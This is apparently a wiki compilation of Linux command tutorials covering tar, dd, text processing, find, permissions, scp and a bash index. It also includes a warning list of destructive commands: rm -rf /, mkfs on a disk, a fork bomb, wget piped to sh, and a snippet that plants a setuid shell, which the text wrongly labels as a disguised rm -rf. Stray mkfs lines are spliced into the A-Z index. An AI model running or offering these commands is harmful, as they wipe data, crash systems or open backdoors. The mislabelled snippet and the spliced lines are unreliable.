Compressing and uncompressing tar files
Compressing and uncompressing tar files
Line 1,196: Line 693:
Many modern Unix systems, such as Linux, use GNU tar, a version of tar produced by the Free Software Foundation. If your system uses GNU tar, you can easily use gzip (the GNU file compression program) in conjunction with tar to create compressed archives. To do this, enter:

tar -cvzf file.tar.gz inputfile1 inputfile2

Here, the  z  option tells tar to zip the archive as it is created. To unzip such a zipped tar file, enter:

tar -xvzf file.tar.gz

Alternatively, if your system does not use GNU tar, but nonetheless does have gzip, you can still create a compressed tar file, via the following command:

tar -cvf - inputfile1 inputfile2 | gzip > file.tar.gz

Note: If gzip isn't available on your system, use the Unix compress command instead. In the example above, replace gzip with compress and change the .gz extension to .Z (the compress command specifically looks for an uppercase Z). You can use other compression programs in this way as well. Just be sure to use the appropriate extension for the compressed file, so you can identify which program to use to decompress the file later.
If you are not using GNU tar, to separate a tar archive that was compressed by gzip, enter:

gunzip -c file.tar.gz | tar -xvf -

Similarly, to separate a tar archive compressed with the Unix compress command, replace gunzip with uncompress.
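Putting the two notes above together, a sketch of the create/extract pair when only the classic compress/uncompress tools are available (file and input names are placeholders):

tar -cvf - inputfile1 inputfile2 | compress > file.tar.Z
uncompress -c file.tar.Z | tar -xvf -
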
The tar command has many additional command options available. For more information, consult the manual page. At the shell prompt, enter:

man tar

GNU tar comes with additional documentation, including a tutorial, accessible through the GNU Info interface. You can access this documentation by entering:

info tar

Within the Info interface, press  ?  (the question mark) for a list of commands.
</pre>

== DD Unix Command ==
<pre>
dd is a common Unix program whose primary purpose is the low-level copying and conversion of raw data

Example use of dd command to create an ISO disk image from a CD-ROM:

dd if=/dev/cdrom of=/home/sam/myCD.iso bs=2048 conv=sync,notrunc
Note that an attempt to copy the entire disk image using cp may omit the final block if it is an unexpected length; dd will always complete the copy if possible.

Using dd to wipe an entire disk with random data:

dd if=/dev/urandom of=/dev/hda

Using dd to duplicate one hard disk partition to another hard disk:

dd if=/dev/sda2 of=/dev/sdb2 bs=4096 conv=notrunc,noerror
Note that notrunc means do not truncate the output file, and noerror means to keep going if there is an error (though a better tool for this would be ddrescue).
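For reference, a minimal ddrescue invocation for the same partition-to-partition copy might look like the sketch below (the device names and the map-file name are placeholders; verify your actual devices before running anything like this):

ddrescue /dev/sda2 /dev/sdb2 rescue.map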


To search the system memory:

dd if=/dev/mem | hexdump -C | grep 'some-string-of-words-in-the-file-you-forgot-to-save-before-you-hit-the-close-button'

Image a partition to another machine:

On source machine:
dd if=/dev/hda bs=16065b | netcat targethost-IP 1234
On target machine:
netcat -l -p 1234 | dd of=/dev/hdc bs=16065b
Two ways to speed up dd: first, raise the block size from the default 512 bytes; second, address the fact that a single dd is either reading or writing at any given moment. If you pipe the first dd into a second one, the copy can run at the maximum speed of the slowest device.
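A sketch of that pipe trick, combining a larger block size with a reader dd feeding a writer dd (device names are placeholders):

dd if=/dev/sda bs=64k | dd of=/dev/sdb bs=64k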
</pre>
 
== Ubuntu Text Editors and Other Commands for Manipulating Text ==
<pre>
===Nano Text Editor===


$ nano memo.txt Open memo.txt for editing
$ nano -B memo.txt When saving, back up the previous version to filename~
$ nano -m memo.txt Turn on mouse to move cursor (if supported)
$ nano +83 memo.txt Begin editing on line 83
The -m command-line option turns on support for a mouse. You can use the mouse to select a position in the text, and the cursor moves to that position. After the first click, though, nano uses the mouse to mark a block of text, which may not be what you are expecting.


====Listing, Sorting, and Changing Text====
Instead of just editing a single text file, you can use a variety of Linux commands to display, search, and manipulate the contents of one or more text files at a time.
Listing Text Files
The most basic method to display the contents of a text file is with the cat command. The cat command concatenates (in other words, outputs as a string of characters) the contents of a text file to your display (by default). You can then use different shell metacharacters to direct the contents of that file in different ways. For example:
$ cat myfile.txt Send entire file to the screen
$ cat myfile.txt > copy.txt Direct file contents to another file
$ cat myfile.txt >> myotherfile.txt Append file contents to another file
$ cat -s myfile.txt Display consecutive blank lines as one
$ cat -n myfile.txt Show line numbers with output
$ cat -b myfile.txt Show line numbers only on non-blank lines
However, if your block of text is more than a few lines long, using cat by itself becomes impractical. That's when you need better tools to look at the beginning or the end, or page through the entire text.


====To view the top of a file, use head:====
$ head myfile.txt
$ cat myfile.txt | head
Both of these command lines use the head command to output the top 10 lines of the file. You can specify the line count as a parameter to display any number of lines from the beginning of a file. For example:

$ head -n 50 myfile.txt Show the first 50 lines of a file
$ ps auwx | head -n 15 Show the first 15 lines of ps output
This can also be done using this obsolete (but shorter) syntax:

$ head -50 myfile.txt
$ ps auwx | head -15
You can use the tail command in a similar way to view the end of a file:

$ tail -n 15 myfile.txt Display the last 15 lines in a file
$ tail -15 myfile.txt Display the last 15 lines in a file
$ ps auwx | tail -n 15 Display the last 15 lines of ps output
The tail command can also be used to continuously watch the end of a file as the file is written to by another program. This is very useful for reading live log files when troubleshooting apache, sendmail, or many other system services:

# tail -f /var/log/messages Watch system messages live
# tail -f /var/log/maillog Watch mail server messages live
# tail -f /var/log/httpd/access_log Watch web server messages live
====Paging Through Text====
When you have a large chunk of text and need to get to more than just its beginning or end, you need a tool to page through the text. The original Unix system pager was the more command:

$ ps auwx | more Page through the output of ps (press spacebar)
$ more myfile.txt Page through the contents of a file
However, more has some limitations. For example, in the line with ps above, more could not scroll up. The less command was created as a more powerful and user-friendly more. The common saying when less was introduced was: "What is less? less is more!" We recommend you no longer use more, and use less instead.

The less command has another benefit worth noting. Unlike text editors such as vi, it does not read the entire file when it starts. This results in faster start-up times when viewing large files.
The less command can be used with the same syntax as more in the examples above:
$ ps auwx | less Page through the output of ps
$ cat myfile.txt | less Page through the contents of a file
$ less myfile.txt Page through a text file
The less command enables you to navigate using the up and down arrow keys, PageUp, PageDown, and the spacebar. If you are using less on a file (not standard input), press v to open the current file in an editor. Which editor gets launched is determined by environment variables defined for your account. The editor is taken from the environment variable VISUAL, if defined, or EDITOR if VISUAL is not defined. If neither is defined, less invokes the JOE editor on Ubuntu.

While viewing a file, less can also follow it as it grows (similar to tail -f); press Ctrl+c to interrupt that mode. As in vi, while viewing a file with less, you can search for a string by pressing / (forward slash) followed by the string and Enter. To search for further occurrences, press / and Enter repeatedly.
To scroll forward and back while using less, use the F and B keys, respectively. For example, 10f scrolls forward 10 lines and 15b scrolls back 15 lines. Type d to scroll down half a screen and u to scroll up half a screen.
====Searching for Text with grep====
The grep command comes in handy when you need to perform more advanced string searches in a file. In fact, the phrase to grep has actually entered the computer jargon as a verb, just as to Google has entered the popular language. Here are examples of the grep command:
$ grep francois myfile.txt Show lines containing francois
# grep 404 /var/log/httpd/access_log Show lines containing 404
$ ps auwx | grep init Show init lines from ps output
$ ps auwx | grep "\[*\]" Show bracketed commands
$ dmesg | grep "[ ]ata\|^ata" Show ata kernel device information
These command lines have some particular uses, beyond being examples of the grep command. By searching access_log for 404 you can see requests to your web server for pages that were not found (these could be someone fishing to exploit your system, or a web page you moved or forgot to create). Displaying bracketed commands that are output from the ps command is a way to see commands for which ps cannot display options. The last command checks the kernel ring buffer for any ATA device information, such as hard disks and CD-ROM drives.


The grep command can also recursively search a few or a whole lot of files at the same time. The following command recursively searches files in the /etc/httpd/conf and /etc/httpd/conf.d directories for the string VirtualHost:
$ grep -R VirtualHost /etc/httpd/conf*
Note that your system may not have any files with names starting with conf in the /etc/httpd directory, depending on what you have installed on your system. You can apply this technique to other files as well.

Add line numbers (-n) to your grep command to find the exact lines where the search terms occur:
$ grep -Rn VirtualHost /etc/httpd/conf*
To colorize the searched term in the search results, add the --color option:

$ grep --color -Rn VirtualHost /etc/httpd/conf*
By default, in a multifile search, the file name is displayed for each search result. Use the -h option to disable the display of file names. This example searches for the string sshd in the file auth.log:

$ grep -h sshd /var/log/auth.log
If you want to ignore case when you search messages, use the -i option:

$ grep -i selinux /var/log/messages Search file for selinux (any case)
To display only the name of the file that includes the search term, add the -l option:

$ grep -Rl VirtualHost /etc/httpd/conf*
To display all lines that do not match the string, add the -v option:

$ grep -v "200 " /var/log/httpd/access_log* Show lines without "200 "
  Note
When piping the output of ps into grep, here's a trick to prevent the grep process from appearing in the grep results:

# ps auwx | grep "[i]nit"
====Replacing Text with Sed====
Finding text within a file is sometimes the first step towards replacing text. Editing streams of text is done using the sed command. The sed command is actually a full-blown scripting language. For the examples in this chapter, we cover basic text replacement with the sed command.
If you are familiar with text replacement commands in vi, sed has some similarities. In the following example, you would replace only the first occurrence per line of francois with chris. Here, sed takes its input from a pipe, while sending its output to stdout (your screen):
$ cat myfile.txt | sed s/francois/chris/
Adding a g to the end of the substitution line, as in the following command, causes every occurrence of francois to be changed to chris. Also, in the following example, input is directed from the file myfile.txt and output is directed to mynewfile.txt:

$ sed s/francois/chris/g < myfile.txt > mynewfile.txt
The next example replaces the first occurrence per line of the text /home/bob with /home2/bob in the /etc/passwd file. (Note that this command does not change that file, but outputs the changed text.) This is useful for the case when user accounts are migrated to a new directory (presumably on a new disk), named with much deliberation, home2. Here, we have to use quotes and backslashes to escape the forward slashes so they are not interpreted as delimiters:


$ sed 's/\/home\/bob/\/home2\/bob/g' < /etc/passwd
Although the forward slash is the sed command's default delimiter, you can change the delimiter to any other character of your choice. Changing the delimiter can make your life easier when the string contains slashes. For example, the previous command line that contains a path could be replaced with either of the following commands:

$ sed 's-/home/bob/-/home2/bob/-' < /etc/passwd
$ sed 'sD/home/bob/D/home2/bob/D' < /etc/passwd
In the first line shown, a dash (-) is used as the delimiter. In the second case, the letter D is the delimiter.

The sed command can run multiple substitutions at once, by preceding each one with -e. Here, in the text streaming from myfile.txt, all occurrences of francois are changed to FRANCOIS and occurrences of chris are changed to CHRIS:
$ sed -e s/francois/FRANCOIS/g -e s/chris/CHRIS/g < myfile.txt
You can use sed to add newline characters to a stream of text. Where Enter appears, press the Enter key. The > on the second line is generated by bash, not typed in.


$ echo aaabccc | sed 's/b/\Enter
> /'
aaa
ccc
The trick just shown does not work on the left side of the sed substitution command. When you need to substitute newline characters, it's easier to use the tr command.


====Translating or Removing Characters with tr====
The tr command is an easy way to do simple character translations on the fly. In the following example, new lines are replaced with spaces, so all the files listed from the current directory are output on one line:
$ ls | tr '\n' ' ' Replace newline characters with spaces
The tr command can be used to replace one character with another, but does not work with strings like sed does. The following command replaces all instances of the lowercase letter f with a capital F.

$ tr f F < myfile.txt Replace every f in the file with F
You can also use the tr command to simply delete characters. Here are two examples:

$ ls | tr -d '\n' Delete new lines (resulting in one line)
$ tr -d f < myfile.txt Delete every letter f from the file
The tr command can do some nifty tricks when you specify ranges of characters to work on. Here's an example of capitalizing lowercase letters to uppercase letters:

$ echo chris | tr a-z A-Z Translate chris into CHRIS
CHRIS
The same result can be obtained with the following syntax:

$ echo chris | tr '[:lower:]' '[:upper:]' Translate chris into CHRIS
====Checking Differences Between Two Files with diff====
When you have two versions of a file, it can be useful to know the differences between the two files. For example, when upgrading a software package, you may save your old configuration file under a new file name, such as config.old or config.bak, so you preserve your configuration. When that occurs, you can use the diff command to discover which lines differ between your configuration and the new configuration, in order to merge the two. For example:

$ diff config config.old
You can change the output of diff to what is known as unified format. Unified format can be easier to read by human beings. It adds three lines of context before and after each block of changed lines that it reports, and then uses + and - to show the difference between the files. The following set of commands creates a file (f1.txt) containing a sequence of numbers (1-7), creates a file (f2.txt) with one of those numbers changed (using sed), and compares the two files using the diff command:

$ seq 1 7 > f1.txt Send a sequence of numbers to f1.txt
$ cat f1.txt Display contents of f1.txt
1
2
3
4
5
6
7
$ sed s/4/FOUR/ < f1.txt > f2.txt Change 4 to FOUR and send to f2.txt
$ diff f1.txt f2.txt
4c4 Shows line 4 was changed in file
< 4
---
> FOUR
Running the same comparison with diff -u adds information such as modification dates and times to the regular diff output. The sdiff command can be used to give you yet another view. The sdiff command can merge the output of two files interactively, as shown in the following output:


$ sdiff f1.txt f2.txt
1 1
2 2
3 3
4 | FOUR
5 5
6 6
7 7
'''Another variation on the diff theme is vimdiff, which opens the two files side by side in Vim and outlines the differences in color. Similarly, gvimdiff opens the two files in gVim.'''


  Note
You need to install the vim-gnome package to run the gvim or gvimdiff program.
The output of diff -u can be fed into the patch command. The patch command takes an old file and a diff file as input and outputs a patched file. Following on the example above, we use the diff command between the two files to generate a patch and then apply the patch to the first file:
$ diff -u f1.txt f2.txt > patchfile.txt
$ patch f1.txt < patchfile.txt
patching file f1.txt
$ cat f1.txt
1
2
3
FOUR
5
6
7
That is how many OSS developers (including kernel developers) distribute their code patches. The patch and diff commands can also be run on entire directory trees. However, that usage is outside the scope of this book.
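As a brief illustration of that directory-tree usage (directory and file names here are hypothetical), a recursive unified diff can be generated and then applied from inside the old tree:

$ diff -ruN project-1.0 project-1.1 > project.patch
$ cd project-1.0
$ patch -p1 < ../project.patch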


====Using awk and cut to Process Columns====
Another massive text processing tool is the awk command. The awk command is a full-blown programming language. Although there is much more you can do with the awk command, the following examples show you a few tricks related to extracting columns of text:
$ ps auwx | awk '{print $1,$11}' Show columns 1, 11 of ps
$ ps auwx | awk '/francois/ {print $11}' Show francois' processes
$ ps auwx | grep francois | awk '{print $11}' Same as above
The first example displays the contents of the first column (user name) and eleventh column (command name) from currently running processes output from the ps command (ps auwx). The next two commands produce the same output, with one using the awk command and the other using the grep command to find all processes owned by the user named francois. In each case, when processes owned by francois are found, column 11 (command name) is displayed for each of those processes.

By default, the awk command assumes the delimiter between columns is spaces. You can specify a different delimiter with the -F option as follows:
$ awk -F: '{print $1,$5}' /etc/passwd Use colon delimiter to print cols
You can get similar results with the cut command. As with the previous awk example, we specify a colon (:) as the column delimiter to process information from the /etc/passwd file:

$ cut -d: -f1,5 /etc/passwd Use colon delimiter to print cols
The cut command can also be used with ranges of fields. The following command prints columns 1 through 5 of the /etc/passwd file:

$ cut -d: -f1-5 /etc/passwd Show columns 1 through 5
Instead of using a dash (-) to indicate a range of numbers, you can use it to print all columns from a particular column number and above. The following command displays all columns from column 5 and above from the /etc/passwd file:

$ cut -d: -f5- /etc/passwd Show columns 5 and later
We prefer to use the awk command when columns are separated by a varying number of spaces, such as the output of the ps command. And we prefer the cut command when dealing with files delimited by commas (,) or colons (:), such as the /etc/passwd file.


====Converting Text Files to Different Formats====
Text files in the Unix world use a different end-of-line character (\n) than those used in the DOS/Windows world (\r\n). You can view these special characters in a text file with the od command:
$ od -c -t x1 myfile.txt
So that the files appear properly when copied from one environment to the other, it is necessary to convert them. Here are some examples:

$ unix2dos < myunixfile.txt > mydosfile.txt
$ cat mydosfile.txt | dos2unix > myunixfile.txt
The unix2dos example just shown above converts a Linux or Unix plain text file (myunixfile.txt) to a DOS or Windows text file (mydosfile.txt). The dos2unix example does the opposite by converting a DOS/Windows file to a Linux/Unix file. These commands require you to install the tofrodos package.
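If the tofrodos package is not installed, the tr command covered above can strip the DOS carriage returns as a quick substitute (a sketch; the file names are the same placeholders used above):

$ tr -d '\r' < mydosfile.txt > myunixfile.txt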


</pre>
== Searching for Files Using Locate and Find ==
<pre>
Searching for Files
Ubuntu keeps a database of all the files in the file system (with a few exceptions defined in /etc/updatedb.conf) using features of the mlocate package. The locate command allows you to search that database. (On Ubuntu, the locate command is a symbolic link to the secure version of the command, slocate.) The results come back instantly, since the database is searched and not the actual file system. Before locate was available, most Linux users ran the find command to find files in the file system. Both locate and find are covered here.
Finding Files with Locate
Because the database contains the name of every node in the file system, and not just commands, you can use locate to find commands, devices, man pages, data files, or anything else identified by a name in the file system. Here is an example:
$ locate e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000/e1000.ko
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000/napi.h
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000/napi.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000/Makefile
/usr/src/linux-headers-2.6.20-16/include/config/e1000.h
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000/Makefile
The above example found two versions of the e1000.ko kernel module (one for each installed kernel). locate is case sensitive unless you use the -i option. Here's an example:
$ locate -i itco_wdt
/lib/modules/2.6.20-16-generic/kernel/drivers/char/watchdog/iTCO_wdt.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/char/watchdog/iTCO_wdt.ko
The slocate package (or mlocate on some Linux distributions) includes a cron job that runs the updatedb command once per day to update the locate database of files.
To update the locate database immediately, you can run the updatedb command manually:
$ sudo updatedb
Locating Files with Find
Before the days of locate, the way to find files was with the find command. Although locate will come up with a file faster, find has many other powerful options for finding files based on attributes other than the name.
    Note   
Searching the entire file system can take a long time to complete. Before searching the whole file system, consider searching a subset of the file system or excluding certain directories or remotely mounted file systems.
This example searches the root file system (/) recursively for files named e100:
$ find / -name "e100*" -print
find: /usr/lib/audit: Permission denied
find: /usr/libexec/utempter: Permission denied
/sys/module/e100
/sys/bus/pci/drivers/e100
...
Running find as a normal user can result in long lists of Permission denied errors as find tries to enter directories you do not have permission to read. You can filter out the inaccessible directories:
$ find / -name e100 -print 2>&1 | grep -v "Permission denied"
Or send all errors to the /dev/null bit bucket:
$ find / -name e100 -print 2> /dev/null
Because searches with find are case sensitive and must match the name exactly (e100 won't match e100.ko), you can use shell-style wildcards to make your searches more inclusive. Here's an example:
$ find / -name 'e100*' -print
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e100.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e100.ko
/usr/src/linux-headers-2.6.20-16-generic/include/config/e100.h
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e100.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/include/config/e100.h
/usr/src/linux-headers-2.6.20-15/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000
/usr/src/linux-headers-2.6.20-16/include/config/e100.h
/usr/src/linux-headers-2.6.20-16/include/config/e1000.h
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000
You can also find files based on timestamps. This command line finds files in /usr/bin/ that have been accessed in the past two minutes:
$ find /usr/bin/ -amin -2 -print
/usr/bin/
/usr/bin/find
This command line finds files that have not been accessed in /home/chris for more than 60 days:
$ find /home/chris/ -atime +60
Use the -type d option to find directories. The following command line finds all directories under /etc and redirects stderr to the bit bucket (/dev/null):
$ find /etc -type d -print 2> /dev/null
This command line finds files in /sbin with permissions that match 750:
$ find /sbin/ -perm 750 -print
(which match none in a default Ubuntu installation.)
The exec option to find is very powerful, because it lets you act on the files found with the find command. The following command finds all the files in /var owned by the user francois (must be a valid user) and executes the ls -l command on each one:
$ find /var -user francois -exec ls -l {} \;
An alternative to find's exec option is xargs:
$ find /var -user francois -print | xargs ls -l
There are big differences on how the two commands just shown operate, leading to very different performance. The find -exec spawns the command ls for each result it finds. The xargs command works more efficiently by passing many results as input to a single ls command.
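If you do want to stay with -exec, find can also batch arguments in a similar way to xargs by terminating the command with + instead of \; (a small illustrative addition to the example above):
$ find /var -user francois -exec ls -l {} +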
To negate a search criteria, place an exclamation point (!) before that criteria. The next example finds all the files that are not owned by the group root and are regular files, and then does an ls -l on each:
$ find / ! -group root -type f -print 2> /dev/null | xargs ls -l
The next example finds the files in /sbin that are regular files and are not writable by others, then feeds them to an ls -l command:
$ find /sbin/ -type f ! -perm /o+w -print | xargs ls -l
-rwxr-xr-x 1 root root    3056 2007-03-07 15:44 /sbin/acpi_available
-rwxr-xr-x 1 root root    43204 2007-02-18 20:18 /sbin/alsactl
Finding files by size is a great way to determine what is filling up your hard disks. The following command line finds all files that are greater than 10 MB (+10M), lists those files from largest to smallest (ls -lS) and directs that list to a file (/tmp/bigfiles.txt):
$ find / -xdev -size +10M -print | xargs ls -lS > /tmp/bigfiles.txt
In this example, the -xdev option prevents any mounted file systems, besides the root file system, from being searched. This is a good way to keep the find command from searching the /proc directory and any remotely mounted file systems, as well as other locally mounted file systems.
Using Other Commands to Find Files
Other commands for finding files include the whereis and which commands. Here are some examples of those commands:
$ whereis man
man: /usr/bin/man /usr/X11R6/bin/man /usr/bin/X11/man /usr/local/man
/usr/share/man /usr/share/man/man1/man.1.gz /usr/share/man/man7/man.7.gz
$ which ls
/bin/ls
The whereis command is useful because it not only finds commands, it also finds man pages and configuration files associated with a command. From the example of whereis for the word man, you can see the man executable, its configuration file, and the location of man pages for the man command. The which example shows where the ls executable is (/bin/ls). The which command is useful when you're looking for the actual location of an executable file in your PATH.
</pre>
== Setting File and Directory Permissions ==
<pre>
Setting File/Directory Permissions
The ability to access files, run commands, and change to a directory can be restricted with permission settings for user, group, and other users. When you do a long list (ls -l) of files and directories in Linux, the beginning 10 characters shown indicate what the item is (file, directory, block device, and so on) along with whether or not the item can be read, written, and/or executed.
To follow along with examples in this section, create a directory called /tmp/test and a file called /tmp/test/hello.txt. Then do a long listing of those two items, as follows:
$ mkdir /tmp/test
$ echo "some text" > /tmp/test/hello.txt
$ ls -ld /tmp/test/ /tmp/test/hello.txt
drwxr-xr-x  2 francois sales 4096 Mar 21 13:11 /tmp/test
-rw-r--r--  2 francois sales  10 Mar 21 13:11 /tmp/test/hello.txt
After creating the directory and file, the first character of the long listing shows /tmp/test as a directory (d) and hello.txt as a file (-). Other types of files available in Linux that would appear as the first character include character devices (c), block devices (b), symbolic links (l), named pipes (p), and sockets (s).
The next nine characters represent the permissions set on the file and directory. The first rwx indicates that the owner (francois) has read, write, and execute permissions on the directory. Likewise, the group sales has the more restricted permissions (r-x) with no write permission. Then all other users have only read and execute permissions (r-x); the dash indicates the missing write permission. For the hello.txt file, the user has read and write permissions (rw-) and members of the group and all others have read permission (r--).
When you set out to change permissions, each permission can be represented by an octal number (where read is 4, write is 2, and execute is 1) or a letter (rwx). Generally speaking, read permission lets you view the contents of the directory, write lets you change (add or modify) the contents of the directory, and execute lets you change to (in other words, access) the directory.
If you don't like the permissions you see on files or directories you own, you can change those permissions using the chmod command.
Changing Permissions with chmod
The chmod command lets you change the access permissions of files and directories. Table 4-1 shows several chmod command lines and how access to the directory or file changes.
Table 4-1: Changing Directory and File Access Permissions
(chmod command | original permission -> new permission | description)

chmod 0700                  any -> drwx------
    The directory's owner can read or write files in that directory as well as change to it. All other users (except root) have no access.
chmod 0711                  any -> drwx--x--x
    Same as for the owner. All others can change to the directory, but not view or change files in the directory. This can be useful for server hardening, where you prevent someone from listing directory contents, but allow access to a file in the directory if someone already knows it's there.
chmod go+r                  drwx------ -> drwxr--r--
    Adding read permission to a directory may not give desired results. Without execute on, others can't view the contents of any files in that directory.
chmod 0777 or chmod a=rwx   any -> drwxrwxrwx
    All permissions are wide open.
chmod 0000 or chmod a-rwx   any -> d---------
    All permissions are closed. Good to protect a directory from errant changes. However, backup programs that run as non-root may fail to back up the directory's contents.
chmod 666                   any -> -rw-rw-rw-
    Open read/write permissions completely on a file.
chmod go-rw                 -rw-rw-rw- -> -rw-------
    Don't let anyone except the owner view, change, or delete the file.
chmod 644                   any -> -rw-r--r--
    Only the owner can change or delete the file, but all can view it.
The first 0 in the mode line can usually be dropped (so you can use 777 instead of 0777). That placeholder has special meaning. It is an octal digit that can be used on commands (executables) to indicate that the command can run as a set-UID program (4), run as a set-GID program (2), or become a sticky program (1). With set-UID and set-GID, the command runs with the assigned user or group permissions (instead of running with permission of the user or group that launched the command).
Warning
SUID should not be used on shell scripts. Here is a warning from the Linux Security HOWTO: "SUID shell scripts are a serious security risk, and for this reason the kernel will not honor them. Regardless of how secure you think the shell script is, it can be exploited to give the cracker a root shell."
Having the sticky bit on for a directory keeps users from removing or renaming files from that directory that they don't own (/tmp is an example). Given the right permission settings, however, users can change the contents of files they don't own in a sticky bit directory. The final permission character is t instead of x on a sticky directory. A command with sticky bit on used to cause the command to stay in memory, even while not being used. This is an old Unix feature that is not supported in Linux.
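As a small illustration of the sticky bit (the directory name below is hypothetical), a world-writable shared directory is usually created the same way /tmp is set up:
$ sudo mkdir /shared
$ sudo chmod 1777 /shared  Anyone can create files; only a file's owner (or root) can remove them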
The -R option is a handy feature of the chmod command. With -R, you can recursively change permissions of all files and directories starting from a point in the file system. Here are some examples:
$ sudo chmod -R 700 /tmp/test  Open permission only to owner below /tmp/test
$ sudo chmod -R 000 /tmp/test  Close all permissions below /tmp/test
$ sudo chmod -R a+rwx /tmp/test Open all permissions to all below /tmp/test
Note that the -R option is inclusive of the directory you indicate. So the permissions above, for example, would change for the /tmp/test directory itself, and not just for the files and directories below that directory.
Setting the umask
Permissions given to a file or directory are assigned originally at the time that item is created. How those permissions are set is based on the user's current umask value. Using the umask command, you can set the permissions given to files and directories when you create them.
$ umask 0066  Make directories drwx--x--x and files -rw-------
$ umask 0077  Make directories drwx------ and files -rw-------
$ umask 0022  Make directories drwxr-xr-x and files -rw-r--r--
$ umask 0777  Make directories d--------- and files ----------
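To check the current value before changing it, run umask with no arguments (a small addition, not part of the original list):
$ umask        Display the current umask value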
Changing Ownership
When you create a file or directory, your user account is assigned to that file or directory. So is your primary group. As root user, you can change the ownership (user) and group assigned to a file to a different user and/or group using the chown and chgrp commands. Here are some examples:
$ chown chris test/          Change owner to chris
$ chown chris:market test/  Change owner to chris and group to market
$ chgrp market test/        Change group to market
$ chown -R chris test/      Change all files below test/ to owner chris
The recursive option to chown (-R) just shown is useful if you need to change the ownership of an entire directory structure. As with chmod, using chown recursively changes permissions for the directory named, along with its contents. You might use chown recursively when a person leaves a company or stops using your web service. You can use chown -R to reassign their entire /home directory to a different user.</pre>
== 7 Deadly Linux Commands ==
<pre>
The 7 Deadly Linux Commands

If you are new to Linux, chances are you will run into someone, perhaps in a forum or chat room, who tries to trick you into running commands that will harm your files or even your entire operating system. To avoid that dangerous scenario, here is a list of deadly Linux commands that you should never run.

1. rm -rf /
This command recursively and forcefully deletes all the files inside the root directory.

2. The following C snippet (shown truncated here) is a hex-encoded version of [rm -rf /] that can deceive even rather experienced Linux users:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
...
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

3. mkfs.ext3 /dev/sda
This reformats (wipes out) the device named after the mkfs command.

4. :(){:|:&};:
Known as a fork bomb, this command tells your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. any_command > /dev/sda
With this command, raw data is written to a block device, which can clobber the filesystem and result in total loss of data.

6. wget http://some_untrusted_source -O- | sh
Never download from untrusted sources and then execute the possibly malicious code they give you.

7. mv /home/yourhomedirectory/* /dev/null
This command moves all the files inside your home directory to a place that doesn't exist; you will never see those files again.

There are of course other equally deadly Linux commands not included here.
</pre>

== Copy Files Using SCP ==
<h4>copy from a remote machine to my machine:</h4>
'''you have to be in the local machine terminal to run the command below'''
scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt
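Going the other direction works the same way with the source and destination swapped; this sketch assumes the same hypothetical host and paths as above:
scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt
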
== List of Linux Bash Shell Commands ==
<pre>
An A-Z Index of the Linux BASH command line


alias Create an alias
*This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
apropos Search Help manual pages (man -k)
awk Find and Replace text, database sort/validate/index
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)


cal Display a calendar
mkfs.ext3 /dev/sda
case Conditionally perform a command
cat Display the contents of a file
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts


date Display or change the date & time
dc Desk Calculator
dd Data Dump - Convert and copy a file
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
du Estimate file space usage


echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions


false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros


gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)


